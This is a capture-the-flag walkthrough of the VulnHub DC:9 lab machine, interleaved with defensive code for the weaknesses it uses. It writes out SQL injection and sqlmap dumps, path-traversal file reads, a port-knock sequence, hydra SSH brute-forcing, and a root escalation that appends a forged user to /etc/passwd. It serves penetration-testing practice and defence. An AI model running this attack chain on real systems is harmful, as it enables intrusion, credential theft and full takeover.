vulnhub DC:9

This is a VulnHub machine for practising penetration testing and exploitation. It is meant to exercise reconnaissance, SQL injection, Local File Inclusion (LFI), brute-forcing and privilege escalation skills. The approach to compromising this machine is as follows.

Reconnaissance

nmap found ports 80 and 22:

# nmap dc9
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))

Port 22 showing as filtered suggests that port knocking may be in use.

Gaining web admin access via SQL injection

Browsing the site, search.php was found to have an SQL injection vulnerability:

searching for ' or '1'='1 returns every record.

Save the following request as search.request:

POST /results.php HTTP/1.1
Host: 192.168.1.7
Content-Length: 11
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.7
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.7/search.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

search=joey

Running sqlmap as below confirmed that the parameter is injectable:

sqlmap -r search.request

Dump the credentials in the Users table with sqlmap:

# sqlmap -r search_form.txt --dump -D Staff -T Users    
...omit...  
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+

The password is an MD5 hash; it can be cracked with online tools such as https://crackstation.net/.

Cracking it gives the password transorbital1.

Logging in with the admin account and this password succeeds.
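As an added illustration, not code from the original write-up or from the DC:9 machine, the following Python (sqlite3) shows why the ' or '1'='1 search above returns every row, next to the parameterised form that closes the hole. The table name, columns and rows are constructed; the target's real search schema is not shown on this page.

```python
import sqlite3

# Constructed stand-in for the staff table behind search.php; the real
# table name and columns on the target are not shown in the write-up.
SAMPLE_STAFF = [
    ("Mary", "Moe"),
    ("Julie", "Dooley"),
    ("Fred", "Flintstone"),
    ("Joey", "Tribbiani"),
]

def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE StaffDetails (firstname TEXT, lastname TEXT)")
    conn.executemany("INSERT INTO StaffDetails VALUES (?, ?)", SAMPLE_STAFF)
    return conn

def build_vulnerable_sql(term):
    """The query shape that makes ' or '1'='1 match every row: the search
    term is spliced straight into the WHERE clause, so its quotes close the
    string literal and the rest is parsed as SQL."""
    return ("SELECT firstname, lastname FROM StaffDetails "
            "WHERE firstname = '" + term + "' OR lastname = '" + term + "'")

def search_vulnerable(term):
    return _connect().execute(build_vulnerable_sql(term)).fetchall()

def search_safe(term):
    """Same search with bound parameters: the term is compared as a value,
    so quotes inside it never change the statement."""
    sql = ("SELECT firstname, lastname FROM StaffDetails "
           "WHERE firstname = ? OR lastname = ?")
    return _connect().execute(sql, (term, term)).fetchall()
```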

Obtaining sensitive system information via Local File Inclusion

After logging in, a "File does not exist" message appears at the bottom of the page.

It takes a file= parameter, which is vulnerable to Local File Inclusion (LFI); file contents can be read as follows:

http://dc9/manage.php?file=../../../../../../../etc/passwd

Reading /etc/knockd.conf works too:

http://dc9/welcome.php?file=../../../../../../../../etc/knockd.conf

Its contents are:

[openSSH]
 sequence = 7469,8475,9842
 seq_timeout = 25
 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 9842,8475,7469
 seq_timeout = 25
 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

Using nc to connect to ports 7469, 8475 and 9842 in that order, port 22 is then found to be open:

$ nc -v dc9 7469
10.0.0.14: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.14] 7469 (?) : Connection refused

$ nc -v dc9 8475                                                                                       
10.0.0.14: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.14] 8475 (?) : Connection refused

$ nc -v dc9 9842                                                                                       
10.0.0.14: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.14] 9842 (?) : Connection refused

$ nc -v dc9 22                                                                                         
10.0.0.14: inverse host lookup failed: Unknown host
(UNKNOWN) [10.0.0.14] 22 (ssh) open
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u1

Cracking SSH credentials

Use sqlmap to list candidate usernames and passwords:

$ sqlmap -r search_form.txt --dump -D users -T UserDetails
...omit...
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

Save the usernames to usernames.txt and the passwords to passwords.txt, then test them against SSH with hydra:

$ hydra -L usernames.txt -P passwords.txt dc9 ssh
[DATA] attacking ssh://dc9:22/
[22][ssh] host: dc9   login: chandlerb   password: UrAG0D!
[22][ssh] host: dc9   login: joeyt   password: Passw0rd
[22][ssh] host: dc9   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found

Log in as janitor:

$ ssh janitor@dc9
janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Jan 21 07:41 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Jan 21 07:41 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin

janitor@dc-9:~$ cd .secrets-for-putin/

janitor@dc-9:~/.secrets-for-putin$ ls -la
total 12
drwx------ 2 janitor janitor 4096 Dec 29  2019 .
drwx------ 4 janitor janitor 4096 Jan 21 07:41 ..
-rwx------ 1 janitor janitor   66 Dec 29  2019 passwords-found-on-post-it-notes.txt

janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Copy the contents of passwords-found-on-post-it-notes.txt over and run hydra again; two more valid credential pairs are found:

$ hydra -L usernames.txt -P passwords-found-on-post-it-notes.txt dc9 ssh 
...
[DATA] attacking ssh://dc9:22/
[22][ssh] host: dc9   login: joeyt   password: Passw0rd
[22][ssh] host: dc9   login: fredf   password: B4-Tru3-001
1 of 1 target successfully completed, 2 valid passwords found
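From the defender's side, as an added example that is not part of the original write-up: a small Python detector for the trail both hydra runs above leave in sshd's auth log, many different usernames failing from one source address within a short window, followed by a success. The log lines are constructed to resemble that trail; the hostnames, PIDs, ports and addresses are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log excerpt: the trail a hydra username-list run
# against sshd leaves, followed by one normal login from another host.
SAMPLE_AUTH_LOG = """\
Jan 21 07:40:01 dc-9 sshd[1201]: Failed password for invalid user marym from 10.0.0.5 port 51000 ssh2
Jan 21 07:40:01 dc-9 sshd[1203]: Failed password for invalid user julied from 10.0.0.5 port 51002 ssh2
Jan 21 07:40:02 dc-9 sshd[1205]: Failed password for fredf from 10.0.0.5 port 51004 ssh2
Jan 21 07:40:02 dc-9 sshd[1207]: Failed password for invalid user barneyr from 10.0.0.5 port 51006 ssh2
Jan 21 07:40:03 dc-9 sshd[1209]: Failed password for invalid user tomc from 10.0.0.5 port 51008 ssh2
Jan 21 07:40:03 dc-9 sshd[1211]: Accepted password for janitor from 10.0.0.5 port 51010 ssh2
Jan 21 07:45:40 dc-9 sshd[1302]: Accepted password for fredf from 10.0.0.20 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$")

def parse_auth_log(text, year=2024):
    """Yield (timestamp, result, user, ip) for each sshd password event."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog timestamps carry no year, so one is supplied
            ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_spray(text, window_s=60, min_users=3):
    """Flag each source IP with failed logins for >= min_users distinct
    accounts inside window_s seconds, and list any account it then got into."""
    by_ip = defaultdict(list)
    for ts, result, user, ip in parse_auth_log(text):
        by_ip[ip].append((ts, result, user))
    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        fails = [(ts, u) for ts, r, u in events if r == "Failed"]
        for i, (start, _) in enumerate(fails):
            users = {u for ts, u in fails[i:]
                     if (ts - start).total_seconds() <= window_s}
            if len(users) >= min_users:
                accepted = sorted(u for ts, r, u in events
                                  if r == "Accepted" and ts >= start)
                alerts[ip] = {"distinct_users": len(users), "accepted": accepted}
                break
    return alerts
```

A single user failing once and then logging in (10.0.0.20 in the sample) does not trip the rule; five accounts failing from 10.0.0.5 inside two seconds and then a successful janitor login does.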

Privilege Escalation

Log in as fredf; sudo -l shows that /opt/devstuff/dist/test/test can be run as root:

$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

$ cd /opt/devstuff/dist/test
/opt/devstuff/dist/test$ ./test
Usage: python test.py read append

/opt/devstuff/dist/test$ find / -name "test.py" -type f 2>/dev/null
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py

The contents of /opt/devstuff/test.py are below; it appends the contents of the first file given to the end of the second:

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
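Both weaknesses used in this write-up, the file= include and the sudo-able test.py, share one missing check: neither confines the path it is handed. As an added example (not the page's or the machine's code), this Python version of both operations canonicalises the path with os.path.realpath and refuses anything that resolves outside an allowed directory; the directory names and file contents it uses are constructed.

```python
import os
import tempfile

def resolve_within(base_dir, user_path):
    """Canonicalise user_path under base_dir and reject it if, once '..' and
    symlinks resolve, it lies outside base_dir. An absolute user_path fails
    too: os.path.join drops base_dir for it, so /etc/passwd stays outside."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes %s: %r" % (base, user_path))
    return candidate

def include_page(user_file, pages_dir):
    """Hardened stand-in for the file= include: reads only below pages_dir."""
    with open(resolve_within(pages_dir, user_file), "r") as f:
        return f.read()

def append_file(src, dst, allowed_dir):
    """Hardened test.py: dst must resolve inside allowed_dir, so a NOPASSWD
    sudo rule on this tool can no longer be pointed at /etc/passwd."""
    target = resolve_within(allowed_dir, dst)
    with open(src, "r") as f:
        data = f.read()
    with open(target, "a") as f:
        f.write(data)
    return target

def _blocked(fn):
    try:
        fn()
        return False
    except ValueError:
        return True

def demo():
    """Exercise both helpers on constructed files in a scratch directory."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        src = os.path.join(root, "user.txt")
        with open(src, "w") as f:
            f.write("constructed sample line\n")
        results["include_ok"] = include_page("user.txt", root)
        results["traversal_blocked"] = _blocked(  # the page's traversal payload
            lambda: include_page("../../../../../../../etc/passwd", root))
        results["passwd_blocked"] = _blocked(
            lambda: append_file(src, "/etc/passwd", root))
        with open(append_file(src, "out.txt", root)) as f:
            results["appended"] = f.read()
    return results
```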

First, generate a password hash on the attacking machine:

# openssl passwd -1 -salt salt password123
$1$salt$/3NHsNrNmNbOO90IOW9dw/

Then build an entry for a new user g0tmarks in /etc/passwd format and save it to /tmp/user.txt:

$ echo 'g0tmarks:$1$salt$/3NHsNrNmNbOO90IOW9dw/:0:0::/root:/bin/bash' > /tmp/user.txt
$ cat /tmp/user.txt
g0tmarks:$1$salt$/3NHsNrNmNbOO90IOW9dw/:0:0::/root:/bin/bash

Then use /opt/devstuff/dist/test/test to append /tmp/user.txt to the end of /etc/passwd:

$ sudo /opt/devstuff/dist/test/test /tmp/user.txt /etc/passwd
$ tail /etc/passwd
...omit...
g0tmarks:$1$salt$/3NHsNrNmNbOO90IOW9dw/:0:0::/root:/bin/bash   
$ su g0tmarks
# cat theflag.txt

Once that succeeds, switch to the new user to read theflag.txt.

References
https://hummus-ful.github.io/vulnhub/2021/01/22/DC-9.html
https://systemweakness.com/vlunhub-dc-9-a80d55b27d0a